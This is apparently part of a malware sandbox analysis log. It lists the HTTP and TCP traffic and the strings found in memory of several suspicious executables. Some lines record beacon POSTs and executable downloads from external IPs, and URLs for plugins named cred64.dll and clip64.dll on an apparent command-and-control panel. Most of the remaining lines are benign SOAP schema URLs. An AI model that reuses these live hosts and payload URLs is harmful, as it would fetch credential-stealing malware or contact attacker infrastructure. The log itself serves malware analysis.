Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://chdgimlpjf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crpqe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: GET /anon/an.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.124.47
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fwflp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gbxxgvql.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: 77.91.68.29
Source: global traffic	HTTP traffic detected: GET /fuzz/raman.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.91.68.248
Source: global traffic	HTTP traffic detected: POST /fks/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rvljh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: 77.91.68.29

Source: global traffic	TCP traffic: 192.168.2.5:49911 -> 77.91.124.84:19071
Source: global traffic	TCP traffic: 192.168.2.5:50201 -> 185.253.96.117:2227

Source: pdates.exe, 0000000C.00000002.908312889.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/clip64.dll
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/clip64.dllgP
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, pdates.exe, 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/cred64.dll
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/cred64.dllG
Source: pdates.exe, 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/cred64.dllb05
Source: pdates.exe, 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/Plugins/cred64.dllh
Source: pdates.exe, 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php#5o
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php1/rock/index.php
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php1/rock/index.php-5
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php95y
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.php=B
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpA6A
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpQ5Q
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpSB
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpZ
Source: pdates.exe, 0000000C.00000002.908312889.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpcsD4Q
Source: pdates.exe, 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.68.61/rock/index.phpl
Source: explorer.exe, 00000001.00000000.420112413.00007FFA13109000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
Source: explorer.exe, 00000001.00000000.420112413.00007FFA13109000.00000002.00000001.01000000.00000005.sdmp	String found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
Source: ohcompetitive.exe, 0000000D.00000002.790846680.00000000083E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: ohcompetitive.exe, 0000000D.00000003.480543157.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.480057993.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.479859145.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.480784367.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.480414409.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.481018767.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.480183584.00000000059F4000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.480004033.00000000059F3000.00000004.00000020.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000003.479704037.00000000059F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.w
Source: ohcompetitive.exe, 0000000D.00000002.774528295.0000000007082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmH
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: j8994074.exe, 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
